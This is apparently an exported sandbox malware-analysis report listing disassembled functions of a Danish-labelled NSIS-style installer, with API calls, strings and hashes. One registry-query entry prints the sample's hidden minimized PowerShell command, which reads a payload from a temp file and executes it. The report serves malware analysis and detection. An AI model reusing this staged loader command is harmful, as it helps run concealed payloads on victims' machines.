Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401E35 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
ReleaseDC.USER32 ref: 00401E6B
CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA

Strings

Tahoma, xrefs: 00401EA0

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: b428dbf066e451782afb30897d59d51ceb01418a72ff73eea60025d7aa45f1e0
Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
Opcode Fuzzy Hash: b428dbf066e451782afb30897d59d51ceb01418a72ff73eea60025d7aa45f1e0
Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00402DBA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
MulDiv.KERNEL32(00071250,00000064,?), ref: 00402E00
wsprintfA.USER32 ref: 00402E10
SetWindowTextA.USER32(?,?), ref: 00402E20
SetDlgItemTextA.USER32 ref: 00402E32

Strings

verifying installer: %d%%, xrefs: 00402E0A

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004056E4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 00405727
GetLastError.KERNEL32 ref: 0040573B
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
GetLastError.KERNEL32 ref: 0040575A

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040570A
C:\Users\user\Desktop, xrefs: 004056E4

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-2752704311
Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
GlobalFree.KERNEL32 ref: 0040288E
GlobalFree.KERNEL32 ref: 004028A1
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8

Uniqueness

Uniqueness Score: -1.00%

Function 004049C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Arbejdsdatabasens Setup: Installing,Arbejdsdatabasens Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
wsprintfA.USER32 ref: 00404A6A
SetDlgItemTextA.USER32 ref: 00404A7D

Strings

%u.%u%s%s, xrefs: 00404A4C
Arbejdsdatabasens Setup: Installing, xrefs: 00404A54, 00404A59, 00404A5F, 00404A73

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Arbejdsdatabasens Setup: Installing
API String ID: 3540041739-3254718859
Opcode ID: a1c755fdd4d8c4595d0eeac3b8ec17e8d877cccc6c1b0446fe9a747102dae0da
Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
Opcode Fuzzy Hash: a1c755fdd4d8c4595d0eeac3b8ec17e8d877cccc6c1b0446fe9a747102dae0da
Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9

Uniqueness

Uniqueness Score: -1.00%

Function 00402CD0 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 014359240982161b3b5bd7628af9b76503ec5cddf5478d92d844c1bc3b0f5ff5
Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
Opcode Fuzzy Hash: 014359240982161b3b5bd7628af9b76503ec5cddf5478d92d844c1bc3b0f5ff5
Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D65 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00401D7E
GetClientRect.USER32 ref: 00401DCC
LoadImageA.USER32 ref: 00401DFC
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
DeleteObject.GDI32(00000000), ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6

Strings

!, xrefs: 00401C6A

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405A8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403335,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403335,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405A8F

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD

Uniqueness

Uniqueness Score: -1.00%

Function 00402E3D Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
GetTickCount.KERNEL32 ref: 00402E6E
CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
ShowWindow.USER32(00000000,00000005), ref: 00402E99

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED

Uniqueness

Uniqueness Score: -1.00%

Function 00405192 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004051C1
CallWindowProcA.USER32 ref: 00405212

Part of subcall function 004041C7: SendMessageA.USER32(0001042C,00000000,00000000,00000000), ref: 004041D9

Strings

, xrefs: 004051A2

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405FDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,?,?,?,?,00000002,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,?,00406293,80000002), ref: 00406024
RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam,?,Execute: Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder"), ref: 0040602F

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam, xrefs: 00405FE1, 00406015

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: CloseQueryValue
String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\valeria\subsessile.Cam
API String ID: 3356406503-97934569
Opcode ID: d97dd86cb34ce03d87666da177996c96680878e4c907d1346d8251a9292e207d
Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
Opcode Fuzzy Hash: d97dd86cb34ce03d87666da177996c96680878e4c907d1346d8251a9292e207d
Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00403875 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,745CFA90,00000000,C:\Users\user~1\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
GlobalFree.KERNEL32 ref: 00403896

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403875

Memory Dump Source

Source File: 00000000.00000002.198903367.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198841334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199010192.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199014990.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.199274219.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_demand_rpkb_060923.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 1100898210-2382934351
Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88

Uniqueness

Uniqueness Score: -1.00%

Function 00405AD6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

